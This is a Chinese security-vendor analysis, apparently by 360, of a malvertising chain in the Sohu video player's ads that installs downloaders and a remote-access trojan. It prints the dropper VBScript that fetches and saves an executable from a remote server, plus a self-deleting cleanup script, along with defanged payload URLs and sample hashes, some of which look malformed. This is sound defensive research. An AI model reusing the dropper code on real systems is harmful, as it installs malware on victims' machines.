作者:
360安全衛士
·
2015/06/26 16:05
0x00 前言
圖:播放器掛馬行為鏈
在國內流行的影音播放器客戶端內嵌廣告中,有一部分來自廣告聯盟和各種營銷平臺。在搜狐影音展示的一個私服廣告頁面中,我們監測到一個惡意的iframe標籤,標籤內容帶有一段vbs指令碼。
0x01 vbs指令碼
該指令碼的作用是將遠端伺服器上的svchost.exe程式重新命名為putty.exe(一個下載者)檔案:
1: Set xPost=createObject("Microsoft.XMLHTTP")
2: xPost.Open "GET","http://183.xxx.80.93:3389/svchost.exe",0
3: xPost.Send()
4: set sGet=createObject("ADODB.Stream")
5: sGet.Mode=3
6: sGet.Type=1
7: sGet.Open()
8: sGet.Write xPost.ResponseBody
9: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2
10: Set xPost=createObject("Microsoft.XMLHTTP")
11: xPost.Open "GET","http://183.xxx.80.93:3377/svchost.exe",0
12: xPost.Send()
13: set sGet=createObject("ADODB.Stream")
14: sGet.Mode=3
15: sGet.Type=1
16: sGet.Open()
17: sGet.Write xPost.ResponseBody
18: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2
0x02 putty.exe程式分析
讀取遠端伺服器上的txt文件,進行批次下載
讀取hxxp://txt.ichajianlianmeng.com:88/1001.txt頁面的內容,然後進行下載。呼叫用InternetConnectA建立遠端訪問
透過httpOpenRequestA和HttpSendRequestA建立請求併傳送請求到HTTP伺服器:
讀取到遠端伺服器中的txt儲存的內容(該檔案中的內容經常變動,一段時間能捕獲到遠控木馬。)
hxxp://down.ichajianlianmeng.com:888/sie.exe
hxxp://www.yczuowenwang.com/xp.exe
hxxp://cdn.yuu361.com/download/Fresh_20i5_052039fc.exe
hxxp://down.woka123.cn/qudao/lol/dmxyxhh_504.exe
hxxp://down.biomall.org.cn/meng/up/niutu410202.exe
hxxp://down.nvjay.com:6677/huajun/huajun_15-8.exe
hxxp://down.ichajianlianmeng.com:888/59801_6789_sd1.exe
hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe
hxxp://download.suxiazai.com/for_down/2013/install1552262.exe
透過InternetReadFile依次讀取上面連結的內容到程式中:
建立檔案、寫入資料、執行該程式:
後面就迴圈讀取完連結中的內容並建立程式,第一輪下載就完畢了:
中間會建立一個空的MD5檔案,該檔案只是用來做標記,如果再次執行這個下載者就不再進行下載了:
0x03 sie.exe---|下載者裡的下載者
木馬就像混黑社會似的,也喜歡打群架,這個下載者又放出一個下載者,兩者的功能和實現都一樣,這裡就不再重複分析了。
第二輪下載透過訪問hxxp://txt.ichajianlianmeng.com:88/siedown.txt檔案中的以下連結進行下載:
1: http://down.meituview.com/MTViewbuildmtview_116.exe
2: #
3: http://down.secaikan.com/sckt/jm/setup_sc150002.exe
4: #
5: http://down.shkbx.com/SC_rg0cfc_xt2005_1.exe
6: #
7: http://down.shkbx.com/SC_rg0cfc_xt2000_1.exe
8: #
9: http://down.woka123.cn/qudao/lol/dmxyxhh_505.exe
10: #
11: http://down.sou2v.com/UserFiles/install_107_1a.exe
12: #
13: http://down.sushouspell.com/sushou/sw/-2208_1_ss.exe
然後得到以下檔案:
如果中招,電腦會變成如下樣子。重啟後桌面圖示還會更多一些,為照顧密集恐懼症患者,這裡不再貼出:
0x04 xx360.exe遠控木馬
和所有木馬作者一樣,“中國外掛聯盟”對360的仇恨也是深入骨髓。再看看該下載者放出的遠控木馬(xx360)。
透過亂序字串拼接的方式獲取到即將建立檔案的路徑:
建立檔案、訪問hxxp://61.160.195.24:666/NetSyst81.dll並讀取資料到記憶體中
將剛剛讀取到的資料寫入NetSys.dll檔案中
讀取NetSys.dll中的內容,並在記憶體再申請空間,解密剛剛獲取到的NetSys.dll檔案,解密後獲得一個PE結構的檔案(利用這樣的方法迷惑防毒軟體):
建立並執行Terms.EXE.exe檔案:
建立登錄檔和服務,達到隱藏和長期駐紮在使用者電腦裡而且開機自啟動:
釋放vbs檔案,刪除自身,使自己隱藏起來:
1: dim wsh
2: On Error Resume Next
3: set wsh=createObject("WScript.Shell")
4: Set objFSO = CreateObject("Scripting.FileSystemObject")
5: wscript.sleep 1000
6: objFSO.DeleteFile("C:\Documents and Settings\Administrator\桌面\360.exe"), True
7: createobject("scripting.filesystemobject").deletefile wscript.scriptfullname
對遠控抓包分析(原來的遠控木馬已經不能連線上了,這裡把自己的主機配置成該目標程式),一看就是zlib格式的,前面就是一個頭,擷取後面的拿去python指令碼里跑一跑:
用Python解密後,看到自己電腦的作業系統版本,以及使用者名稱,還有上線時間了
1: a = 'b313640002154620310788598118c4d6e062606002d2c1a9456599c9a90a0189c9d90ac60c7407cc208211e8220510e3c00ac60686ff20b137f68c50150220820b44241695649416eb1a1a269ba6985b1a32182d3c68ac676ce4ee51c56070e68dc1a98d26e6dbaf31d88459e8991bda2904c71b1a19181b98321819189aea1a98e91a1a29181a5a9918321c5973e2fcf66bd75f329cdbb27dd1f96b0a0c0029dd29b0'
2: import codecs
3: b = codecs.decode(a, 'hex_codec')
4: zlib.decompress(b, -8)
0x05 部分樣本資訊
以下是透過“中國外掛聯盟”下載者捕獲到的檔案MD5。由於該遠端伺服器上的資料包在不斷更新,獲取到的安裝包有很大量,以下只是其中一部分:
1: e3198f710f307e16413cd7d599f971ebc
2: e3198f710f307e16413cd7d599f971eb
3: 1552ccfa8cef81056d5c23d167cafd19c
4: 1552ccfa8cef81056d5c23d167cafd19
5: bba33d5501a780c392e4da520506da25
6: 6b08cdde7530efab0a9a5275ff4867b3
7: abba9c49e181f27b4f387ab88c505646
8: a22e31255f3092f4d1b429d76976ba0f
9: 8268182d660f2d72c05ff3c2bec90f61
10: 8910b238873a26f76854c102eab68673
11: 2a011d1c0ad02a9acf5315ccb7657713
12: e41c325df557e54ab95ff5dc81abfd8c
13: 20d6852156af4db9cac546e666a436ff
14: a22e31255f3092f4d1b429d76976ba0f
15: e0126226ff5a65b283db12d02ccc5a1d
16: 27c38edd7fd7c8c2eeddac457a407c0f
17: 8fa79dd7f1ba8b047862a904c69d40da
18: e94591e1dd94d0ea6fe2f03d9cdde05c
19: 6d0678e31452aafd6aee2c4947b4ef48
20: 6a5ab49d61623e22618e8b9c4904e85f
21: 45529e071f7f5d5b05705a9e35c5ddab
22: 5312719ecc909d4c47452eacc8452c73
23: 5312719ecc909d4c47452eacc8452c73
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!